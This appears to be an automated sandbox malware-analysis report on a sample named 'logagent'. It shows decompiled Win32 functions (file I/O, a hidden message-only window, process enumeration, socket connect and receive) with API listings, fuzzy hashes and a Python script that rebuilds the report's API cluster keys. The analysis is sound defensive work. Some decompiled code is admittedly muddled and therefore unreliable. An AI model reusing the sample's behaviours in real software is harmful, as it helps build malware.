                                  			// object. The decompiler has muddled the ReadFile buffer and bytes-read arguments: the
                                  			// data lands in the std::string's storage obtained through c_str() just before the call.
                                  			E00412DDF(void _a4, void* _a8) {
                                  				struct _OVERLAPPED* _t13;
                                  				void* _t16;
                                  				long _t17;
                                  				void* _t19;
                                  
                                  				_t13 = 0;
                                  				// GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
                                  				_t19 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
                                  				if(_t19 != 0xffffffff) {
                                  					_t17 = GetFileSize(_t19, 0);              // low 32 bits only
                                  					// string.resize(size, '\0'), then read `size` bytes straight into its storage
                                  					__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z(_t17, 0, _t16);
                                  					_t8 =  &_a4;
                                  					_a4 = 0;
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					if(ReadFile(_t19,  &_a4, _t17, _t8, 0) != 0) {
                                  						_t13 = 1;                              // success
                                  					}
                                  					CloseHandle(_t19);
                                  					return _t13;
                                  				}
                                  				return 0;                                      // could not open the file
                                  			}
                                  
                                  (Disassembly listing 0x00412de3 to 0x00412e48: only the address column survived extraction; the instruction text is not on this page.)

                                  APIs
                                  • CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E0D
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E1A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,?,00409C9F,00000000), ref: 00412E2C
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E34
                                  • CloseHandle.KERNEL32(00000000,?,00409C9F,00000000), ref: 00412E42
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@CloseCreateHandleReadSize
                                  • String ID:
                                  • API String ID: 2061410294-0
                                  • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction ID: e286a7eceb6258eec42f82ecdc09f82327f8599071822df4e1fbbe5006a6f2d0
                                  • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction Fuzzy Hash: EBF08171241518BFEB125F60EC88FFB7B6CEB867A4F108126FD15D6290CA744E418668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 1054B3D8
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 1054B4B2
                                    • Part of subcall function 105544A4: OpenProcess.KERNEL32(00000400,00000000,?,?,1054B52E,?), ref: 105544BA
                                  • wcslen.MSVCRT ref: 1054B5B4
                                  • CreateMutexA.KERNEL32(00000000,00000001,00416510), ref: 1054B604
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFileModuleMutexNameNextOpenProcessProcess32wcslen
                                  • String ID: Program Files\
                                  • API String ID: 3958954344-650562868
                                  • Opcode ID: 28a475965148f6e0499b9abca16bb89debcb3f8bdba6418509cba6558f06b768
                                  • Instruction ID: d97902fa069cc774e3ad64716ba6848e8ab2ee94079610361561769ec47105fc
                                  • Opcode Fuzzy Hash: 28a475965148f6e0499b9abca16bb89debcb3f8bdba6418509cba6558f06b768
                                  • Instruction Fuzzy Hash: 58810D7680050EEBDF049BA0EC59AEEBF78EF48355F144066F506E70A0EB71668ACF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E105546E5(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
                                  				// Writes _a8 bytes from _a4 to the file named by _a12; _a16 selects the
                                  				// mode: 0 = create/overwrite, 1 = append. Returns 1 on success, else 0.
                                  				// Hex values in the trailing comments are the instruction addresses of each statement.
                                  				long _v8;                                  // dwCreationDisposition
                                  				long _v12;                                 // dwDesiredAccess
                                  				intOrPtr _t14;
                                  				struct _OVERLAPPED* _t19;
                                  				long _t22;
                                  				struct _OVERLAPPED* _t24;
                                  				void* _t28;
                                  
                                  				_t24 = 0;                                  // 0x105546ee
                                  				_t14 = _a16;                               // 0x105546f1
                                  				if(_t14 == 0) {                            // 0x105546f3
                                  					_v12 = 0x40000000;                     // 0x10554703  GENERIC_WRITE
                                  					_v8 = 2;                               // 0x1055470a  CREATE_ALWAYS
                                  				} else {
                                  					if(_t14 == 1) {                        // 0x105546f6
                                  						_t22 = 4;                          // 0x105546fa
                                  						_v12 = _t22;                       // 0x105546fb  FILE_APPEND_DATA
                                  						_v8 = _t22;                        // 0x105546fe  OPEN_ALWAYS
                                  					}
                                  					// any other _a16 value leaves _v12 and _v8 uninitialised (no default branch)
                                  				}
                                  				// 0x80 = FILE_ATTRIBUTE_NORMAL; no sharing, no security descriptor, no template
                                  				_t28 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24); // 0x10554728
                                  				if(_t28 != 0xffffffff) {                   // 0x1055472d  INVALID_HANDLE_VALUE
                                  					// append mode seeks to the end of the file first: 2 = FILE_END
                                  					if(_a16 != 1 || SetFilePointer(_t28, _t24, _t24, 2) != 0xffffffff) { // 0x10554737
                                  						// the bytes-written count is stored over the _a12 argument slot
                                  						if(WriteFile(_t28, _a4, _a8,  &_a12, _t24) != 0) { // 0x1055475d
                                  							_t24 = 1;                      // 0x1055475f  success
                                  						}
                                  					}
                                  					CloseHandle(_t28);                     // 0x10554762
                                  					_t19 = _t24;                           // 0x10554768
                                  				} else {
                                  					_t19 = 0;                              // 0x1055472f
                                  				}
                                  				return _t19;                               // 0x1055476d
                                  			}
                                  
                                  APIs
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,[DEBUG],00000000), ref: 10554722
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 1055473E
                                  • WriteFile.KERNEL32(00000000,40000000,?,?,00000000), ref: 10554755
                                  • CloseHandle.KERNEL32(00000000), ref: 10554762
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandlePointerWrite
                                  • String ID: [DEBUG]
                                  • API String ID: 3604237281-1240233238
                                  • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction ID: c6a9e73b7491868b70ac6a25d6c3371e3c621a62e19ebc15af1f08b98d335358
                                  • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction Fuzzy Hash: A611C471610109FFDF018FA49D88EDF7F6CEB0A3A8F208522F91196090CB714E059F60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00413BC8() {
                                  				// Registers the window class "MsgWindowClass" (see String ID below) and creates
                                  				// an invisible message-only window of that class. Returns the HWND, or 0 on failure.
                                  				// Hex values in the trailing comments are the instruction addresses of each statement.
                                  				char _v20;                                 // class-name buffer
                                  				struct _WNDCLASSEXA _v68;
                                  				struct HWND__* _t21;
                                  				signed int _t23;
                                  
                                  				_t23 = 0xb;                                // 0x00413bd4
                                  				memset( &(_v68.style), 0, _t23 << 2);      // 0x00413bd8  zero the 11 dwords after cbSize
                                  				asm("movsd");                              // 0x00413be2  3*4 + 2 + 1 = 15 bytes copied into _v20:
                                  				asm("movsd");                              // 0x00413be3  the length of "MsgWindowClass" plus its NUL
                                  				asm("movsd");                              // 0x00413be4
                                  				asm("movsw");                              // 0x00413be5
                                  				_v68.cbSize = 0x30;                        // 0x00413bea  sizeof(WNDCLASSEXA)
                                  				asm("movsb");                              // 0x00413bf1
                                  				_v68.lpszClassName =  &_v20;               // 0x00413bf2
                                  				_v68.style = 0;                            // 0x00413bfb
                                  				_v68.lpfnWndProc = E00413C3F;              // 0x00413bfe  window procedure
                                  				_v68.cbClsExtra = 0;                       // 0x00413c05
                                  				_v68.cbWndExtra = 0;                       // 0x00413c08
                                  				_v68.lpszMenuName = 0;                     // 0x00413c0b
                                  				if(RegisterClassExA( &_v68) == 0) {        // 0x00413c17
                                  					L3:                                    // 0x00413c39
                                  					return 0;
                                  				}
                                  				// hWndParent = 0xfffffffd = HWND_MESSAGE: a message-only window that is never shown
                                  				_t21 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0); // 0x00413c29
                                  				if(_t21 == 0) {                            // 0x00413c31
                                  					GetLastError();                        // 0x00413c33  result is discarded
                                  					goto L3;
                                  				}
                                  				return _t21;                               // 0x00413c3e
                                  			}
                                  
                                  APIs
                                  • RegisterClassExA.USER32(00000030), ref: 00413C0E
                                  • CreateWindowExA.USER32 ref: 00413C29
                                  • GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ClassCreateErrorLastRegisterWindow
                                  • String ID: 0$MsgWindowClass
                                  • API String ID: 2877667751-2410386613
                                  • Opcode ID: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                  • Instruction ID: 7311bfe71f6f07f925a5bea5fd399074fa81e1952be4f1bddfc29815928cdf0b
                                  • Opcode Fuzzy Hash: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                  • Instruction Fuzzy Hash: D5019A72C00228AACB21CF91EC08ADFBFB9EF45761B004026F410B6240D7B05606CAE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0040B522: RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                    • Part of subcall function 0040B522: RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                    • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                    • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032DA
                                  • atoi.MSVCRT ref: 004032E1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032ED
                                  Strings
                                  • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004032C1
                                  • CurrentBuildNumber, xrefs: 004032BC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?c_str@?$basic_string@CloseD@1@@OpenQueryValueatoi
                                  • String ID: CurrentBuildNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  • API String ID: 1453687294-3377751560
                                  • Opcode ID: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                  • Instruction ID: fd2564c0d0cdcb3147c4efd585e8939db476c869aa5c4bae27b80d41888a3fe0
                                  • Opcode Fuzzy Hash: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                  • Instruction Fuzzy Hash: FFE04F72A00618E7C700B7A8DC0AFEEB768EB44755F504479B922A21D2EA749518C69C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004126EF(char _a4) {
                                  				// Turns the current thread's pseudo-handle into a real, inheritable handle and
                                  				// stores it over the _a4 argument slot. Returns DuplicateHandle's result.
                                  				// Hex values in the trailing comments are the instruction addresses of each statement.
                                  				void* _t2;
                                  				void* _t3;
                                  
                                  				_t1 =  &_a4; // 0x40e322                   // 0x004126ff  _t1 is the decompiler's alias for &_a4 (lpTargetHandle)
                                  				_t2 = GetCurrentProcess();                 // 0x00412702  target process (pseudo-handle)
                                  				_t3 = GetCurrentThread();                  // 0x00412705  source: the thread pseudo-handle
                                  				// hSourceProcessHandle, hSourceHandle, hTargetProcessHandle, lpTargetHandle,
                                  				// dwDesiredAccess = 0, bInheritHandle = 1, dwOptions = 2 = DUPLICATE_SAME_ACCESS
                                  				return DuplicateHandle(GetCurrentProcess(), _t3, _t2,  *_t1, 0, 1, 2); // 0x00412717
                                  			}
                                  
                                  APIs
                                  • GetCurrentProcess.KERNEL32("@,00000000,00000001,00000002,0041B310,?,0040E322,?), ref: 00412702
                                  • GetCurrentThread.KERNEL32 ref: 00412705
                                  • GetCurrentProcess.KERNEL32(00000000,?,0040E322,?), ref: 0041270C
                                  • DuplicateHandle.KERNEL32(00000000,?,0040E322,?), ref: 0041270F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Current$Process$DuplicateHandleThread
                                  • String ID: "@
                                  • API String ID: 3566409357-445313631
                                  • Opcode ID: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                  • Instruction ID: 81c68930a35107f79e7ff7c0b5ef314a0f7766eb9aca927b546ed436d96719c8
                                  • Opcode Fuzzy Hash: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                  • Instruction Fuzzy Hash: FFD09E71D40718B7D91127E5AC0DFCA3F1CDB49771F108421F60896090CAA594408A94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 1055447A: GetCurrentProcess.KERNEL32(1054A8C9,?,?,1054A8C9,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 1055448B
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1054B85E
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 1054B87F
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 1054B88C
                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 1054BA4E
                                    • Part of subcall function 105544A4: OpenProcess.KERNEL32(00000400,00000000,?,?,1054B52E,?), ref: 105544BA
                                    • Part of subcall function 105540A7: _itoa.MSVCRT ref: 105540C5
                                    • Part of subcall function 105544D9: OpenProcess.KERNEL32(00000410,00000000,1054B4C8,00415208), ref: 105544ED
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 1054BA3F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32_itoa
                                  • String ID:
                                  • API String ID: 2412981405-0
                                  • Opcode ID: bf4972b6c10139aa3afd5fd5ed8bf260e7c4fdaf8674d90ab9cd4ae4e4143e54
                                  • Instruction ID: d2ca8770ec0baa679e8e2a90c9d43d1ca1d1179deabba5aa99ebb802afd1ac71
                                  • Opcode Fuzzy Hash: bf4972b6c10139aa3afd5fd5ed8bf260e7c4fdaf8674d90ab9cd4ae4e4143e54
                                  • Instruction Fuzzy Hash: A3511C7580021EEBCF11DBA0DD59EEEBB7CEF94645F1041A6B506E2061EA70AB4DCF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%
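
                                  The "APIs" bullets and the "API ID" field recur in every function record on this page (for example the CreateFileW/SetFilePointer/WriteFile/CloseHandle helper E105546E5 above and the CreateToolhelp32Snapshot/Process32Next/OpenProcess walker just listed). The script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own code: it parses those bullets, rebuilds the "API ID" cluster key from them, and names the Win32 constants the decompiled file helper hands to CreateFileW. The tokenisation and stop-word rules it uses (dropping Get, Set, Reg, Key, Ex, For and the A/W suffixes, grouping tokens by occurrence count, code-point sort inside a group, groups joined with "$") are inferred solely from the values printed on this page and are an assumption; the mangled MSVCP60 C++ names are not covered, and the "API String ID" hashes are not reproduced.

```python
"""Parse the 'APIs' bullets of a Joe Sandbox function record and rebuild the
record's 'API ID' cluster key.  Added example, not Joe Sandbox code: the splitting
and stop-word rules are inferred from this page alone (assumption) and cover
Win32/CRT export names, not the mangled MSVCP60 C++ symbols."""
import re
from collections import Counter

# One bullet: "[Part of subcall function ADDR:] Name.MODULE[(args)][, ref: ADDR]"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s(]+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
# Name fragments the report drops before building the key (inferred from this page).
STOP_TOKENS = {"Get", "Set", "Reg", "Key", "Ex", "For", "A", "W"}

# Win32 constants for the arguments the decompiled helper E105546E5 hands to CreateFileW.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x4: "FILE_APPEND_DATA"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRIBUTES = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02: "FILE_ATTRIBUTE_HIDDEN"}

# Two 'APIs' listings copied verbatim from the records on this page, and the
# 'API ID' the report prints for each, so the rebuilt key can be cross-checked.
LISTINGS = {
    "filewrite": """
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,[DEBUG],00000000), ref: 10554722
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 1055473E
• WriteFile.KERNEL32(00000000,40000000,?,?,00000000), ref: 10554755
• CloseHandle.KERNEL32(00000000), ref: 10554762
""",
    "toolhelp": """
  • Part of subcall function 1055447A: GetCurrentProcess.KERNEL32(1054A8C9,?,?,1054A8C9,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 1055448B
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1054B85E
• Process32FirstW.KERNEL32(00000000,?), ref: 1054B87F
• Process32NextW.KERNEL32(00000000,0000022C), ref: 1054B88C
• CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 1054BA4E
  • Part of subcall function 105544A4: OpenProcess.KERNEL32(00000400,00000000,?,?,1054B52E,?), ref: 105544BA
  • Part of subcall function 105540A7: _itoa.MSVCRT ref: 105540C5
  • Part of subcall function 105544D9: OpenProcess.KERNEL32(00000410,00000000,1054B4C8,00415208), ref: 105544ED
• Process32NextW.KERNEL32(00000000,0000022C), ref: 1054BA3F
""",
}
REPORTED_IDS = {
    "filewrite": "File$CloseCreateHandlePointerWrite",
    "toolhelp": "ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32_itoa",
}

def parse_api_lines(text):
    """One dict per bullet: export name, module, raw args, ref address, subcall address."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = m.group("args")
            calls.append({"name": m.group("name"), "module": m.group("module"),
                          "args": args.split(",") if args else [],
                          "ref": m.group("ref"), "subcall": m.group("sub")})
    return calls

def tokenize(api_name):
    """CamelCase words keep trailing digits, C names keep a leading underscore,
    stop tokens are dropped: Process32NextW -> [Process32, Next]; _itoa -> [_itoa]."""
    parts = re.findall(r"_?[A-Z][a-z0-9]*|_?[a-z][a-z0-9]*", api_name)
    return [p for p in parts if p not in STOP_TOKENS]

def api_id(api_names):
    """Tokens grouped by occurrence count (highest group first), code-point sorted
    inside a group, groups joined with '$'.  Repeated bullets count separately."""
    counts = Counter(tok for name in api_names for tok in tokenize(name))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))

def api_id_from_listing(text):
    return api_id([c["name"] for c in parse_api_lines(text)])

def describe_createfilew(args):
    """Name dwDesiredAccess, dwCreationDisposition and dwFlagsAndAttributes
    (positions 1, 4, 5 of the bullet's argument list; '?' is an unresolved value)."""
    def lookup(table, raw):
        if not re.fullmatch(r"[0-9A-Fa-f]+", raw):
            return "?"
        value = int(raw, 16)
        return table.get(value, f"0x{value:x}")
    return {"access": lookup(ACCESS, args[1]),
            "disposition": lookup(DISPOSITION, args[4]),
            "attributes": lookup(ATTRIBUTES, args[5])}

if __name__ == "__main__":
    for label, text in LISTINGS.items():
        rebuilt = api_id_from_listing(text)
        print(label, "match" if rebuilt == REPORTED_IDS[label] else "MISMATCH", rebuilt)
    first = parse_api_lines(LISTINGS["filewrite"])[0]
    print(first["name"], describe_createfilew(first["args"]))
```

                                  Run as a script it prints the rebuilt key beside the one the report gives for each embedded listing; a mismatch on another report would mean the inferred rules do not hold there. The key is useful for pivoting: two function records with the same "API ID" share the same API vocabulary even when their opcode and instruction fuzzy hashes differ, and decoding the CreateFileW arguments shows directly that the helper opens its target with GENERIC_WRITE and CREATE_ALWAYS, i.e. it replaces the file rather than appending in the call the report captured.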

                                  APIs
                                  • toupper.MSVCRT ref: 105483F0
                                  • toupper.MSVCRT ref: 10548319
                                    • Part of subcall function 10546E78: SetEvent.KERNEL32(?,?,1054866C,?,?,?,?,?,00415D88), ref: 10546EA7
                                  • tolower.MSVCRT ref: 105483C9
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: toupper$Eventtolower
                                  • String ID:
                                  • API String ID: 633968009-0
                                  • Opcode ID: ff00c2dc7da0c86a1395fab722e2c7252abcf6f7f8c2e66e61c4919710f3609e
                                  • Instruction ID: b23e722ba459281cd730ed195749097366a0f17601b6bf0604d10c1d85165db5
                                  • Opcode Fuzzy Hash: ff00c2dc7da0c86a1395fab722e2c7252abcf6f7f8c2e66e61c4919710f3609e
                                  • Instruction Fuzzy Hash: 5D41A271904648EBDB00E7E4E859AFFBF78EB84741F24486AF402D3190EB716A19C796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040AD26
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040AD30
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040AD44
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                    • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                    • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                    • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                    • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040AD6F,00000000,?,?,?,?,?,?), ref: 0040AD5B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040AD64
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$??4?$basic_string@Y?$basic_string@connectfreemallocrecvsocket
                                  • String ID:
